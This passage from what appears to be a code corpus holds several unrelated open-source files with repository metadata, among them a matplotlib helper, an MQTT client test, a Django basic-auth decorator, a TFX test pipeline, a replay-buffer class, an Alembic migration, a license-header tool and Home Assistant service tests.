#---------------------------------------------------------------------------------------
def Legend(self, Location=[]):
self._zo += 1
if Location:
l = plt.legend(loc = Location, numpoints = 1)
else:
# Default outside
l = plt.legend(bbox_to_anchor = (1.05, 1),
loc = 2, borderaxespad = 0.,
numpoints = 1)
l.set_zorder(self._zo)
#---------------------------------------------------------------------------------------
def Show(self):
plt.show(block = False)
#---------------------------------------------------------------------------------------
def Close(self):
plt.close('all')
#---------------------------------------------------------------------------------------
def SaveFig(self, OutFile, Dpi=150):
plt.savefig(OutFile, bbox_inches = 'tight', dpi = Dpi)
| 30.937282 | 90 | 0.401847 | [
"MIT"
] | wqqpp007/geoist | geoist/cattools/MapTools.py | 8,879 | Python |
#!/usr/bin/env python
# Test whether a client sends a correct PUBLISH to a topic with QoS 2 and responds to a disconnect.
import context
import paho_test
rc = 1
keepalive = 60
connect_packet = paho_test.gen_connect(
"publish-qos2-test", keepalive=keepalive, clean_session=False,
)
connack_packet = paho_test.gen_connack(rc=0)
disconnect_packet = paho_test.gen_disconnect()
mid = 1
publish_packet = paho_test.gen_publish(
u"pub/qos2/test", qos=2, mid=mid, payload="message".encode('utf-8'))
publish_dup_packet = paho_test.gen_publish(
u"pub/qos2/test", qos=2, mid=mid, payload="message".encode('utf-8'), dup=True)
pubrec_packet = paho_test.gen_pubrec(mid)
pubrel_packet = paho_test.gen_pubrel(mid)
pubcomp_packet = paho_test.gen_pubcomp(mid)
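# Expected QoS 2 flow exercised below, with two forced disconnects to check
# that the client retransmits correctly:
#   CONNECT -> CONNACK
#   PUBLISH (qos=2)            ... server drops the connection
#   CONNECT -> CONNACK, PUBLISH (dup=1) -> PUBREC -> PUBREL
#                              ... server drops the connection again
#   CONNECT -> CONNACK, PUBREL (retried) -> PUBCOMP -> DISCONNECT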
sock = paho_test.create_server_socket()
client = context.start_client()
try:
(conn, address) = sock.accept()
conn.settimeout(5)
if paho_test.expect_packet(conn, "connect", connect_packet):
conn.send(connack_packet)
if paho_test.expect_packet(conn, "publish", publish_packet):
# Disconnect client. It should reconnect.
conn.close()
(conn, address) = sock.accept()
conn.settimeout(15)
if paho_test.expect_packet(conn, "connect", connect_packet):
conn.send(connack_packet)
if paho_test.expect_packet(conn, "retried publish", publish_dup_packet):
conn.send(pubrec_packet)
if paho_test.expect_packet(conn, "pubrel", pubrel_packet):
# Disconnect client. It should reconnect.
conn.close()
(conn, address) = sock.accept()
conn.settimeout(15)
# Complete connection and message flow.
if paho_test.expect_packet(conn, "connect", connect_packet):
conn.send(connack_packet)
if paho_test.expect_packet(conn, "retried pubrel", pubrel_packet):
conn.send(pubcomp_packet)
if paho_test.expect_packet(conn, "disconnect", disconnect_packet):
rc = 0
conn.close()
finally:
client.terminate()
client.wait()
sock.close()
exit(rc)
| 31.810811 | 99 | 0.614274 | [
"Unlicense"
] | Jegeva/BruCON_2021 | backend/mqtt_react/python_bugg/paho.mqtt.python/test/lib/03-publish-c2b-qos2-disconnect.py | 2,354 | Python |
import base64
from django.http import HttpResponse
from django.contrib.auth import authenticate, login
# Reference: https://www.djangosnippets.org/snippets/243/
def view_or_basicauth(view, request, test_func, realm="", *args, **kwargs):
"""
This is a helper function used by both 'logged_in_or_basicauth' and
    'has_perm_or_basicauth' that does the nitty-gritty of determining if they
are already logged in or if they have provided proper http-authorization
and returning the view if all goes well, otherwise responding with a 401.
"""
if test_func(request.user):
# Already logged in, just return the view.
return view(request, *args, **kwargs)
# They are not logged in. See if they provided login credentials
if 'HTTP_AUTHORIZATION' in request.META:
auth = request.META['HTTP_AUTHORIZATION'].split()
if len(auth) == 2:
# NOTE: We only support basic authentication for now.
if auth[0].lower() == "basic":
                uname, passwd = base64.b64decode(auth[1]).decode('utf-8').split(':')
user = authenticate(username=uname, password=passwd)
if user is not None:
if user.is_active:
login(request, user)
request.user = user
return view(request, *args, **kwargs)
# Either they did not provide an authorization header or
# something in the authorization attempt failed. Send a 401
# back to them to ask them to authenticate.
response = HttpResponse()
response.status_code = 401
response['WWW-Authenticate'] = 'Basic realm="%s"' % realm
return response
def logged_in_or_basicauth(realm=""):
"""
A simple decorator that requires a user to be logged in. If they are not
logged in the request is examined for a 'authorization' header.
If the header is present it is tested for basic authentication and
the user is logged in with the provided credentials.
If the header is not present a http 401 is sent back to the
requestor to provide credentials.
The purpose of this is that in several django projects I have needed
several specific views that need to support basic authentication, yet the
web site as a whole used django's provided authentication.
The uses for this are for urls that are access programmatically such as
by rss feed readers, yet the view requires a user to be logged in. Many rss
readers support supplying the authentication credentials via http basic
auth (and they do NOT support a redirect to a form where they post a
username/password.)
Usage is simple:
@logged_in_or_basicauth()
def your_view:
...
You can provide the name of the realm to ask for authentication within.
"""
def view_decorator(func):
def wrapper(request, *args, **kwargs):
return view_or_basicauth(func, request,
lambda u: u.is_authenticated(),
realm, *args, **kwargs)
return wrapper
return view_decorator
def has_perm_or_basicauth(perm, realm=""):
"""
This is similar to the above decorator 'logged_in_or_basicauth'
except that it requires the logged in user to have a specific
permission.
Use:
        @has_perm_or_basicauth('asforums.view_forumcollection')
def your_view:
...
"""
def view_decorator(func):
def wrapper(request, *args, **kwargs):
return view_or_basicauth(func, request,
lambda u: u.has_perm(perm),
realm, *args, **kwargs)
return wrapper
return view_decorator
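# Illustrative usage sketch (not part of this module; the view names, view
# bodies and realm strings are assumptions):
#
#     @logged_in_or_basicauth(realm="my feeds")
#     def feed_view(request):
#         ...
#
#     @has_perm_or_basicauth('asforums.view_forumcollection', realm="forums")
#     def forum_view(request):
#         ...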
| 37.4 | 79 | 0.649198 | [
"MIT"
] | tullyrankin/python-frameworks | django/basic_auth/example1/decorators.py | 3,740 | Python |
# Configuration file with default options.
# There are four main sections: General, Features, LQP and Learning, corresponding to different
# functionalities. You can disable either the Features or Learning section (by commenting it out) according to your requirements.
[General]
# general options
idir=/home/hussain/datasets/LFW/lfwa # images directory path
odir=/scratch/testing/new-experiments/ # path where cropped_images, learned model and computed features will be stored
dataset=LFW # name of dataset to use; it can be either LFW or FERET [currently not supported]
width=80 # width of cropped images
height=150 # height of cropped images
padding=10 # (same as cellsize) use a padding of one cell on each side. This value must be the same as the cell-size option in the Features section
xoffset=1 # offsets to be added (from the center position) to the crop window placed over the original aligned images
yoffset=-4
cbdataset=train-val # complete # This option is used only with LQP Features. It is used to choose subset of dataset for codebook learning e.g. in case of LFW it can be either view1 training validation ('train-val') subset or complete view1 set('complete')
ftype=LQP # Feature types. Choice can be LBP, LTP, LBP+LTP or LQP
usergb=False # if color images, use color information during feature computations.
[Features]
# options for feature computation
listfile="" # a list file containing list of cropped images to compute features
cellsize=10 # cellsize for the histogram grid
tol=5 # [5,7] # tolerance values used for LTP or LQP features (can pass a list, i.e. tol=[5, 7])
[LQP] #LQP Options
lqptype=2 # LQP type represent LQP geometric structure.
# Choices can be either Disk (2) or Hor+Ver+Diag+ADiag (9) strip.
lqpsize=7 # LQP size represent radius (length of strip)
# of LQP disk (HVDA strip) (can pass a list i.e. lqpsize=[5,7])
coding=4 # LQP encoding type can be: Binary (0), Ternary (1) or Split-Ternary (4)
cbsize=150 # Codebook size (number of visual words) used for
# LQP computation (can pass a list, i.e. cbsize=[100, 150]
cbfile="" # [Optional] A list file containing list of images for learning the codebook
[Learning]
# options for model learning
view=complete # view2 # complete # Choice of the dataset, options can be view1: used for
 # parameter tuning purposes; view2: used only for model
 # evaluation; complete: model parameters will be first
 # tuned on view1 and results will be reported on view2
ttype=with-pca # Choice of training with or without PCA (for feature
 # evaluation). Available options are with-pca
 # (a pca model is learned and features are compared in the pca space)
 # or without-pca (features are compared in their original space)
featdir="" # Directory path where computed features have been stored, used if
# learning is being done without feature computation cycle.
dist=cosine # Distance metric for comparing features. Choices are cosine, chi-square and L2.
# For optimal results use cosine metric for comparing PCA reduced features and
# chi-squared for comparing non-reduced ones.
pcadim=[100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500, 1600, 1700, 1800, 1900, 2000] # Number of PCA components. You can pass a scalar or list, i.e.
# pcadim= 500. In case of a list, all the dimensions will be used
# for model learning (on view1) and finally only the best performing one will be
# kept. Note that a single model with max(pcadim) is learned in this case
# but evaluation is done using all the dimensions.
# Caution: providing a much higher dimension makes the learning slow and memory
# intensive
| 68.241379 | 256 | 0.698585 | [
"BSD-3-Clause"
] | csgcmai/lqp_face | face-rec/config.py | 3,958 | Python |
from __future__ import print_function
import os
import xml.etree.ElementTree as ET
def load_xml_for_module(xml_dir_path, module_name, or_dummy=True):
xml_tree = ET.Element("dummy") if or_dummy else None
for sfx in ["_8hpp", "_8h"]:
xml_path = os.path.join(xml_dir_path, "%s%s.xml" % (module_name, sfx))
if os.path.isfile(xml_path):
with open(xml_path, "rb") as fin:
xml_tree = ET.fromstring(fin.read())
return xml_tree
def get_toplevel_functions(xml_tree, name=None):
path = "./compounddef/sectiondef[@kind='%s']/memberdef[@kind='function']"
if name:
path = "%s/[name='%s']" % (path, name)
all_nodes = []
for section_kind in ["func", "user-defined"]:
nodes = xml_tree.findall(path % section_kind)
all_nodes.extend(map(lambda n: n, nodes))
return all_nodes
def get_single_child_element_text_contents(el, child_element_tag):
nodes = el.findall("./%s" % child_element_tag)
nnodes = len(nodes)
if nnodes == 0:
return None
text = nodes[0].text
if nnodes > 1:
print("Warning: more than 1 child element with tag '%s' found; picking first" % (child_element_tag,))
return text
def for_each_param(node, callback):
assert(node.tag == "memberdef" and node.attrib.get("kind") == "function")
plist = node.find("./detaileddescription/para/parameterlist[@kind='param']")
def get_direct_text(n, tag):
c = n.find("./%s" % tag)
if c is not None:
return " ".join(c.itertext()).strip()
for param in node.findall("./param"):
name, ptyp, desc = None, None, None
name = get_direct_text(param, "declname")
ptyp = get_direct_text(param, "type")
if name and plist is not None:
for plist_item in plist.findall("parameteritem"):
if plist_item.find("./parameternamelist/[parametername='%s']" % name) is not None:
pdesc_node = plist_item.find("./parameterdescription")
if pdesc_node is not None:
desc = " ".join(pdesc_node.itertext()).strip()
callback(name, ptyp, desc)
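# Illustrative usage sketch (the XML directory and module name are
# assumptions; doxygen must have been run with XML output enabled):
#
#     tree = load_xml_for_module("build/doxygen/xml", "mymodule")
#     for fn_node in get_toplevel_functions(tree):
#         fn_name = get_single_child_element_text_contents(fn_node, "name")
#         for_each_param(fn_node,
#                        lambda name, typ, desc: print(fn_name, name, typ, desc))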
| 40.754717 | 109 | 0.622685 | [
"BSD-3-Clause"
] | 745198699/src | tools/doxygen_utils.py | 2,160 | Python |
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test pipeline for tfx.dsl.compiler.compiler."""
import os
import tensorflow_model_analysis as tfma
from tfx.components import CsvExampleGen
from tfx.components import Evaluator
from tfx.components import ExampleValidator
from tfx.components import ImporterNode
from tfx.components import Pusher
from tfx.components import SchemaGen
from tfx.components import StatisticsGen
from tfx.components import Trainer
from tfx.components.trainer.executor import GenericExecutor
from tfx.dsl.components.base import executor_spec
from tfx.dsl.components.common import resolver
from tfx.dsl.experimental import latest_blessed_model_resolver
from tfx.orchestration import data_types
from tfx.orchestration import pipeline
from tfx.proto import pusher_pb2
from tfx.proto import trainer_pb2
from tfx.types import Channel
from tfx.types import standard_artifacts
def create_test_pipeline():
"""Builds an Iris example pipeline with slight changes."""
pipeline_name = "iris"
iris_root = "iris_root"
serving_model_dir = os.path.join(iris_root, "serving_model", pipeline_name)
tfx_root = "tfx_root"
data_path = os.path.join(tfx_root, "data_path")
pipeline_root = os.path.join(tfx_root, "pipelines", pipeline_name)
example_gen = CsvExampleGen(input_base=data_path)
statistics_gen = StatisticsGen(examples=example_gen.outputs["examples"])
importer = ImporterNode(
source_uri="m/y/u/r/i",
properties={
"split_names": "['train', 'eval']",
},
custom_properties={
"int_custom_property": 42,
"str_custom_property": "42",
},
artifact_type=standard_artifacts.Examples).with_id("my_importer")
another_statistics_gen = StatisticsGen(
examples=importer.outputs["result"]).with_id("another_statistics_gen")
schema_gen = SchemaGen(statistics=statistics_gen.outputs["statistics"])
example_validator = ExampleValidator(
statistics=statistics_gen.outputs["statistics"],
schema=schema_gen.outputs["schema"])
trainer = Trainer(
# Use RuntimeParameter as module_file to test out RuntimeParameter in
# compiler.
module_file=data_types.RuntimeParameter(
name="module_file",
default=os.path.join(iris_root, "iris_utils.py"),
ptype=str),
custom_executor_spec=executor_spec.ExecutorClassSpec(GenericExecutor),
examples=example_gen.outputs["examples"],
schema=schema_gen.outputs["schema"],
train_args=trainer_pb2.TrainArgs(num_steps=2000),
# Attaching `TrainerArgs` as platform config is not sensible practice,
      # but is only for testing purposes.
eval_args=trainer_pb2.EvalArgs(num_steps=5)).with_platform_config(
config=trainer_pb2.TrainArgs(num_steps=2000))
model_resolver = resolver.Resolver(
strategy_class=latest_blessed_model_resolver.LatestBlessedModelResolver,
model=Channel(
type=standard_artifacts.Model, producer_component_id=trainer.id),
model_blessing=Channel(type=standard_artifacts.ModelBlessing)).with_id(
"latest_blessed_model_resolver")
eval_config = tfma.EvalConfig(
model_specs=[tfma.ModelSpec(signature_name="eval")],
slicing_specs=[tfma.SlicingSpec()],
metrics_specs=[
tfma.MetricsSpec(
thresholds={
"sparse_categorical_accuracy":
tfma.config.MetricThreshold(
value_threshold=tfma.GenericValueThreshold(
lower_bound={"value": 0.6}),
change_threshold=tfma.GenericChangeThreshold(
direction=tfma.MetricDirection.HIGHER_IS_BETTER,
absolute={"value": -1e-10}))
})
])
evaluator = Evaluator(
examples=example_gen.outputs["examples"],
model=trainer.outputs["model"],
baseline_model=model_resolver.outputs["model"],
eval_config=eval_config)
pusher = Pusher(
model=trainer.outputs["model"],
model_blessing=evaluator.outputs["blessing"],
push_destination=pusher_pb2.PushDestination(
filesystem=pusher_pb2.PushDestination.Filesystem(
base_directory=serving_model_dir)))
return pipeline.Pipeline(
pipeline_name=pipeline_name,
pipeline_root=pipeline_root,
components=[
example_gen,
statistics_gen,
another_statistics_gen,
importer,
schema_gen,
example_validator,
trainer,
model_resolver,
evaluator,
pusher,
],
enable_cache=True,
beam_pipeline_args=["--my_testing_beam_pipeline_args=foo"],
# Attaching `TrainerArgs` as platform config is not sensible practice,
      # but is only for testing purposes.
platform_config=trainer_pb2.TrainArgs(num_steps=2000),
execution_mode=pipeline.ExecutionMode.SYNC)
| 38.711268 | 78 | 0.709478 | [
"Apache-2.0"
] | Saiprasad16/tfx | tfx/dsl/compiler/testdata/iris_pipeline_sync.py | 5,497 | Python |
"""Similar to DDPG except we only need obs and act, not the reward, etc.
"""
import numpy as np
class RingBuffer(object):
def __init__(self, maxlen, shape, dtype='float32'):
self.maxlen = maxlen
self.start = 0
self.length = 0
if dtype == 'uint8':
# Daniel: special case with our XP replay. Force memory allocation
            # right away by the += 0 op, to check that the system has enough RAM.
# Might not be good for speed so we'll have to time it.
self.data = np.zeros((maxlen,) + shape, dtype=np.uint8)
print("Allocating data of size {} ...".format(self.data.shape))
self.data += 0
else:
self.data = np.zeros((maxlen,) + shape).astype(dtype)
# Daniel: avoid over-writing teacher samples.
self.teach_idx = 0
def __len__(self):
return self.length
def __getitem__(self, idx):
# Daniel: we shouldn't be calling this if it's using our DDPG/IMIT.
assert self.teach_idx == 0, \
'Something went wrong, why are we calling this method?'
if idx < 0 or idx >= self.length:
raise KeyError()
return self.data[(self.start + idx) % self.maxlen]
def get_batch(self, idxs):
#return self.data[(self.start + idxs) % self.maxlen]
# Daniel: seems like it's just fine to do this. It's the responsibility
# of the caller to call a valid set of indices. And we do that with
# randint in the memory class later. Here we avoid headaches with
# `self.start` because I restrict it to be at least the teach_idx.
return self.data[idxs]
def append(self, v, is_teacher=False):
if self.length < self.maxlen:
# We have space, simply increase the length.
self.length += 1
if is_teacher:
self.teach_idx += 1
elif self.length == self.maxlen:
# No space, "remove" the first item.
#self.start = (self.start + 1) % self.maxlen
self.start = max(self.teach_idx, (self.start + 1) % self.maxlen)
else:
# This should never happen.
raise RuntimeError()
self.data[(self.start + self.length - 1) % self.maxlen] = v
def array_min2d(x):
x = np.array(x)
if x.ndim >= 2:
return x
return x.reshape(-1, 1)
class Memory(object):
def __init__(self, limit, action_shape, observation_shape, dtype='float32',
do_valid=False):
"""Daniel: careful about RAM usage. See:
https://github.com/BerkeleyAutomation/baselines-fork/issues/9
For this we can assume that in the replay buffer, the teacher samples
come first, and are fixed ahead of time, so our 'starting' index for
adding into the replay buffer should be offset by this quantity.
"""
self.limit = limit
self.do_valid = do_valid
if self.do_valid:
self.valid_frac = 0.2
self.nb_valid_items = 0 # will adjust later
self.observations0 = RingBuffer(limit, shape=observation_shape, dtype=dtype)
self.actions = RingBuffer(limit, shape=action_shape)
self.nb_teach = 0
self.done_adding_teach = False
def sample(self, batch_size):
# Draw such that we always have a proceeding element.
# TODO(Daniel): the -2 doesn't make sense, we don't need a proceeding
# element because the next observation is in a separate ring buffer?? I
# think it should be nb_entries, so we are in practice not sampling the
# last two items in this replay buffer. I'm switching to -1, should do
# 0 later if I'm confident we're not ignoring anything else ...
if self.do_valid:
# If we're doing validation, which should NOT normally be true,
# ignore the first few items, which we assign to be in validation.
batch_idxs = np.random.randint(self.nb_valid_items,
self.nb_entries-1,
size=batch_size)
else:
batch_idxs = np.random.randint(self.nb_entries-1, size=batch_size)
obs0_batch = self.observations0.get_batch(batch_idxs)
action_batch = self.actions.get_batch(batch_idxs)
# Assume `x < self.nb_teach` (not equality!) is a teacher sample.
flag_teacher = (batch_idxs < self.nb_teach).astype(np.float32)
result = {
'obs0': array_min2d(obs0_batch),
'actions': array_min2d(action_batch),
'flag_teacher': array_min2d(flag_teacher),
}
return result
def append(self, obs0, action, is_teacher=False, training=True):
"""Keep separate copies of obs0, obs1. So it's not memory efficient.
"""
if not training:
return
if is_teacher:
assert not self.done_adding_teach, self.nb_teach
assert self.nb_teach < self.limit, self.nb_teach
self.nb_teach += 1
self.observations0.append(obs0, is_teacher)
self.actions.append(action, is_teacher)
def set_teacher_idx(self):
"""Call from IMIT so we do not over-write teacher data.
"""
self.done_adding_teach = True
def set_valid_idx(self):
"""Set the validation index.
"""
assert self.done_adding_teach
self.nb_valid_items = int(self.valid_frac * self.nb_entries)
@property
def nb_entries(self):
return len(self.observations0)
@property
def nb_teach_entries(self):
return self.nb_teach
@property
def nb_valid(self):
return self.nb_valid_items
def get_valid_obs(self, s_idx, e_idx):
"""Get a validation minibatch with fixed starting and ending indices.
"""
assert self.do_valid
batch_idxs = np.arange(s_idx, e_idx)
obs0_batch = self.observations0.get_batch(batch_idxs)
action_batch = self.actions.get_batch(batch_idxs)
result = {
'obs0': array_min2d(obs0_batch),
'actions': array_min2d(action_batch),
}
return result
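# Illustrative usage sketch (not part of the module; the shapes, limit and
# batch size are assumptions):
#
#     mem = Memory(limit=100, action_shape=(4,), observation_shape=(8,))
#     mem.append(np.zeros(8), np.zeros(4), is_teacher=True)   # teacher demo
#     mem.set_teacher_idx()                                   # freeze teacher region
#     mem.append(np.ones(8), np.ones(4))                      # learner sample
#     batch = mem.sample(batch_size=2)
#     # batch['flag_teacher'] marks which samples came from the teacher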
| 38.04908 | 84 | 0.60803 | [
"MIT"
] | DanielTakeshi/baselines-fork | baselines/imit/memory.py | 6,202 | Python |
"""empty message
Revision ID: eb02de174736
Revises: c0de0819f9f0
Create Date: 2020-02-04 18:29:57.302993
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'eb02de174736'
down_revision = 'c0de0819f9f0'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('Shows', 'name',
existing_type=sa.VARCHAR(),
nullable=False)
op.create_foreign_key(None, 'Shows', 'Venue', ['name'], ['name'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'Shows', type_='foreignkey')
op.alter_column('Shows', 'name',
existing_type=sa.VARCHAR(),
nullable=True)
# ### end Alembic commands ###
| 25.257143 | 69 | 0.644796 | [
"Apache-2.0"
] | nkatwesigye/project_furry | starter_code/migrations/versions/eb02de174736_.py | 884 | Python |
from jogo_banco import __version__
def test_version():
assert __version__ == '0.1.0'
| 15.166667 | 34 | 0.725275 | [
"Apache-2.0"
] | rafaelgarrafiel/jogo_banco | tests/test_jogo_banco.py | 91 | Python |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Add or check license header
Usage:
- add the default license header to source files that do not contain a valid
license:
python license_header.py add
- check if every files has a license header
python license_header.py check
"""
import re
import os
import argparse
# the default apache license
_LICENSE = """Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License."""
# if a file contains any str in the list, then consider it has been licensed
_LICENSE_PATTERNS = ['Licensed to the Apache Software Foundation']
# the folders or files that will be ignored
_WHITE_LIST = ['R-package/',
'cub/',
'dlpack/',
'dmlc-core/',
'mshadow/',
'nnvm',
'ps-lite',
'src/operator/mkl/',
'cmake/Modules/FindJeMalloc.cmake',
'src/operator/special_functions-inl.h',
'src/operator/nn/pool.h',
'src/operator/contrib/psroi_pooling-inl.h',
'src/operator/contrib/nn/deformable_im2col.h',
'example/speech-demo/io_func/convert2kaldi.py',
'example/speech-demo/decode_mxnet.sh',
'example/image-classification/predict-cpp/image-classification-predict.cc',
               'src/operator/contrib/ctc_include/']
# language extensions and the corresponding comment mark
_LANGS = {'.cc':'*', '.h':'*', '.cu':'*', '.cuh':'*', '.py':'#',
          '.pm':'#', '.scala':'*', '.sh':'#', '.cmake':'#',
          '.java':'*', '.cpp':'*', '.hpp':'*', '.c':'*',
          '.bat':'rem', '.pl':'#'}
# Previous license header, which will be removed
_OLD_LICENSE = re.compile('.*Copyright.*by Contributors')
def _has_license(lines):
return any([any([p in l.decode('utf-8') for p in _LICENSE_PATTERNS]) for l in lines])
def _get_license(comment_mark):
if comment_mark == '*':
body = '/*\n'
else:
body = ''
for l in _LICENSE.split('\n'):
if comment_mark == '*':
body += ' '
body += comment_mark
if len(l):
body += ' ' + l
body += '\n'
if comment_mark == '*':
body += ' */\n'
body += '\n'
return body
def _valid_file(fname, verbose=False):
if any([l in fname for l in _WHITE_LIST]):
if verbose:
print('skip ' + fname + ', it matches the white list')
return False
_, ext = os.path.splitext(fname)
if ext not in _LANGS:
if verbose:
print('skip ' + fname + ', unknown file extension')
return False
return True
def process_file(fname, action, verbose=True):
if not _valid_file(fname, verbose):
return True
with open(fname, 'rb') as f:
lines = f.readlines()
if not lines:
return True
if _has_license(lines):
return True
elif action == 'check':
return False
_, ext = os.path.splitext(fname)
with open(fname, 'wb') as f:
# shebang line
if lines[0].startswith(b'#!'):
f.write(lines[0].rstrip()+b'\n\n')
del lines[0]
f.write(str.encode(_get_license(_LANGS[ext])))
for l in lines:
f.write(l.rstrip()+b'\n')
print('added license header to ' + fname)
return False
def process_folder(root, action):
excepts = []
for root, _, files in os.walk(root):
for f in files:
fname = os.path.normpath(os.path.join(root, f))
if not process_file(fname, action):
excepts.append(fname)
if action == 'check' and excepts:
raise Exception('The following files do not contain a valid license, '+
'you can use `python tools/license_header.py add` to add'+
'them automatically', excepts)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Add or check source license header')
parser.add_argument(
'action', nargs=1, type=str,
choices=['add', 'check'], default='add',
help = 'add or check')
args = parser.parse_args()
process_folder(os.path.join(os.path.dirname(__file__), '..'), args.action[0])
| 35.134969 | 90 | 0.624411 | [
"Apache-2.0"
] | GrassSunFlower/mxnet | tools/license_header.py | 5,727 | Python |
"""Test service helpers."""
import asyncio
from copy import deepcopy
import unittest
from unittest.mock import patch
# To prevent circular import when running just this file
import homeassistant.components # noqa
from homeassistant import core as ha, loader
from homeassistant.const import STATE_ON, STATE_OFF, ATTR_ENTITY_ID
from homeassistant.helpers import service, template
from homeassistant.setup import async_setup_component
import homeassistant.helpers.config_validation as cv
from tests.common import get_test_home_assistant, mock_service
class TestServiceHelpers(unittest.TestCase):
"""Test the Home Assistant service helpers."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.calls = mock_service(self.hass, 'test_domain', 'test_service')
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_template_service_call(self):
"""Test service call with templating."""
config = {
'service_template': '{{ \'test_domain.test_service\' }}',
'entity_id': 'hello.world',
'data_template': {
'hello': '{{ \'goodbye\' }}',
'data': {
'value': '{{ \'complex\' }}',
'simple': 'simple'
},
'list': ['{{ \'list\' }}', '2'],
},
}
service.call_from_config(self.hass, config)
self.hass.block_till_done()
self.assertEqual('goodbye', self.calls[0].data['hello'])
self.assertEqual('complex', self.calls[0].data['data']['value'])
self.assertEqual('simple', self.calls[0].data['data']['simple'])
self.assertEqual('list', self.calls[0].data['list'][0])
def test_passing_variables_to_templates(self):
"""Test passing variables to templates."""
config = {
'service_template': '{{ var_service }}',
'entity_id': 'hello.world',
'data_template': {
'hello': '{{ var_data }}',
},
}
service.call_from_config(self.hass, config, variables={
'var_service': 'test_domain.test_service',
'var_data': 'goodbye',
})
self.hass.block_till_done()
self.assertEqual('goodbye', self.calls[0].data['hello'])
def test_bad_template(self):
"""Test passing bad template."""
config = {
'service_template': '{{ var_service }}',
'entity_id': 'hello.world',
'data_template': {
'hello': '{{ states + unknown_var }}'
}
}
service.call_from_config(self.hass, config, variables={
'var_service': 'test_domain.test_service',
'var_data': 'goodbye',
})
self.hass.block_till_done()
self.assertEqual(len(self.calls), 0)
def test_split_entity_string(self):
"""Test splitting of entity string."""
service.call_from_config(self.hass, {
'service': 'test_domain.test_service',
'entity_id': 'hello.world, sensor.beer'
})
self.hass.block_till_done()
self.assertEqual(['hello.world', 'sensor.beer'],
self.calls[-1].data.get('entity_id'))
def test_not_mutate_input(self):
"""Test for immutable input."""
config = cv.SERVICE_SCHEMA({
'service': 'test_domain.test_service',
'entity_id': 'hello.world, sensor.beer',
'data': {
'hello': 1,
},
'data_template': {
'nested': {
'value': '{{ 1 + 1 }}'
}
}
})
orig = deepcopy(config)
# Only change after call is each template getting hass attached
template.attach(self.hass, orig)
service.call_from_config(self.hass, config, validate_config=False)
assert orig == config
@patch('homeassistant.helpers.service._LOGGER.error')
def test_fail_silently_if_no_service(self, mock_log):
"""Test failing if service is missing."""
service.call_from_config(self.hass, None)
self.assertEqual(1, mock_log.call_count)
service.call_from_config(self.hass, {})
self.assertEqual(2, mock_log.call_count)
service.call_from_config(self.hass, {
'service': 'invalid'
})
self.assertEqual(3, mock_log.call_count)
def test_extract_entity_ids(self):
"""Test extract_entity_ids method."""
self.hass.states.set('light.Bowl', STATE_ON)
self.hass.states.set('light.Ceiling', STATE_OFF)
self.hass.states.set('light.Kitchen', STATE_OFF)
loader.get_component(self.hass, 'group').Group.create_group(
self.hass, 'test', ['light.Ceiling', 'light.Kitchen'])
call = ha.ServiceCall('light', 'turn_on',
{ATTR_ENTITY_ID: 'light.Bowl'})
self.assertEqual(['light.bowl'],
service.extract_entity_ids(self.hass, call))
call = ha.ServiceCall('light', 'turn_on',
{ATTR_ENTITY_ID: 'group.test'})
self.assertEqual(['light.ceiling', 'light.kitchen'],
service.extract_entity_ids(self.hass, call))
self.assertEqual(['group.test'], service.extract_entity_ids(
self.hass, call, expand_group=False))
@asyncio.coroutine
def test_async_get_all_descriptions(hass):
"""Test async_get_all_descriptions."""
group = loader.get_component(hass, 'group')
group_config = {group.DOMAIN: {}}
yield from async_setup_component(hass, group.DOMAIN, group_config)
descriptions = yield from service.async_get_all_descriptions(hass)
assert len(descriptions) == 1
assert 'description' in descriptions['group']['reload']
assert 'fields' in descriptions['group']['reload']
logger = loader.get_component(hass, 'logger')
logger_config = {logger.DOMAIN: {}}
yield from async_setup_component(hass, logger.DOMAIN, logger_config)
descriptions = yield from service.async_get_all_descriptions(hass)
assert len(descriptions) == 2
assert 'description' in descriptions[logger.DOMAIN]['set_level']
assert 'fields' in descriptions[logger.DOMAIN]['set_level']
| 35.604396 | 75 | 0.603395 | [
"Apache-2.0"
] | DevRGT/home-assistant | tests/helpers/test_service.py | 6,480 | Python |
# ----------------------------------------------------------------
# ---------- ASSOCIATION RULE MINING : NOTABLE ATTEMPT 2 ----------
# ----------------------------------------------------------------
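# NOTE (assumption): this snippet relies on an `apriori` implementation
# (e.g. `from apyori import apriori`) being imported and on the
# `dailyRankedCrimes` / `yearlyRankedCrimes` pandas DataFrames being built
# earlier in the workflow; neither is shown in this file.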
# ------------------ DAILY DATASET --------------------
